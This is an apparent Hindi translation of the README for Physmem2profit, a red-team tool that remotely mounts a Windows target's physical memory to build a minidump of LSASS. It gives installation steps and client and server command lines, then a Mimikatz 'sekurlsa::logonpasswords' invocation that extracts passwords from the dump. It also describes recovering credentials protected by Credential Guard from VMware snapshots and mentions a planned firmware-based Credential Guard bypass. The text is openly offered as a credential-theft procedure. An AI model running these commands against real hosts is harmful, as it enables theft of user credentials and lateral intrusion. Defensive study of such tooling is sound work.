
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
Physmem2profit का उपयोग लक्षित होस्ट की LSASS प्रक्रिया का मिनीडंप बनाने के लिए किया जा सकता है, जो भौतिक मेमोरी का दूरस्थ रूप से विश्लेषण करके किया जाता है। इस शोध का उद्देश्य क्रेडेंशियल चोरी के लिए एक वैकल्पिक दृष्टिकोण प्रस्तावित करना और एक मॉड्यूलर फ्रेमवर्क बनाना है, जिसे भौतिक मेमोरी तक पहुँचने वाले अन्य ड्राइवरों का समर्थन करने के लिए विस्तारित किया जा सकता है। Physmem2profit LSASS का एक मिनीडंप (.dmp) उत्पन्न करता है, जिसका आगे Mimikatz के साथ विश्लेषण किया जा सकता है। यह टूल Cobalt Strike की आवश्यकता नहीं रखता, लेकिन SOCKS प्रॉक्सी के साथ बीकन पर ठीक से काम करना चाहिए।
यह अवधारणा नीचे दिखाई गई है:

इस टूल के दो घटक हैं:
physmem2profit.exe
physmem2profit Python मॉड्यूल
--mode mount के साथ निष्पादित किया जाता है, तो लक्षित मशीन से जुड़ता है और FUSE की सहायता से लक्ष्य की भौतिक RAM को एक रॉ फ़ाइल के रूप में माउंट करता है।--mode dump के साथ निष्पादित किया जाता है, तो मेमोरी इमेज का विश्लेषण करने और LSASS प्रक्रिया का मिनीडंप उत्पन्न करने के लिए विभिन्न Rekall प्लगइन्स को कॉल करता है।--mode all के साथ निष्पादित किया जाता है, तो उपरोक्त दोनों क्रियाएँ करता है। डंप पूरा होने पर सर्वर से कनेक्शन बंद कर दिया जाएगा।git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln बनाएँbash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] चलाएँ।
source physmem2profit/client/.env/bin/activate चलाएँ। यह कमांड install.sh द्वारा बनाए गए virtualenv को सक्रिय कर देगी।cd physmem2profit/client चलाएँ और python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] चलाएँ।
physmem2profit.exe को लक्षित मशीन पर चालू होना आवश्यक है।output/[label]-[date]-lsass.dmp में लिखेगा।mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit" चलाएँ।Credential Guard द्वारा संरक्षित क्रेडेंशियल्स को डिक्रिप्ट करने के लिए Secure World में संग्रहीत एन्क्रिप्शन कुंजी तक पहुँच प्राप्त करना आवश्यक है। परीक्षण प्रयोजनों के लिए, Physmem2profit VMware Fusion/Workstation स्नैपशॉट्स (.vmem फ़ाइलों) से Secure World का डेटा पुनर्प्राप्त करने का समर्थन करता है। यह Credential Guard द्वारा संरक्षित क्रेडेंशियल्स को Mimikatz की सहायता से डिक्रिप्ट करने की अनुमति देता है।
msinfo32 चलाकर सुनिश्चित करें कि Virtualization-based security Services Running Credential Guard कहता है।python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp में लिखेगा। मिनीडंप में एक विशेष स्ट्रीम होती है जिसमें Secure World का डेटा रहता है, जिससे Mimikatz एन्क्रिप्शन कुंजी का पता लगा सकता है।output/[label]-[date]-secure-world.raw में भी संग्रहीत किया जाता है।mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit" चलाएँ।हमारे Disobey talk में प्रदर्शित, S3 Resume firmware vulnerability का शोषण करके Credential Guard को बायपास करने का समर्थन जल्द ही आ रहा है :)।
Rethinking Credential Theft | एक ब्लॉग पोस्ट जो बताती है कि क्रेडेंशियल चोरी का यह दृष्टिकोण क्यों चुना गया।
Physmem2profit को @b3arr0 और @TimoHirvonen द्वारा विकसित किया गया है।
योगदान के लिए सराहना: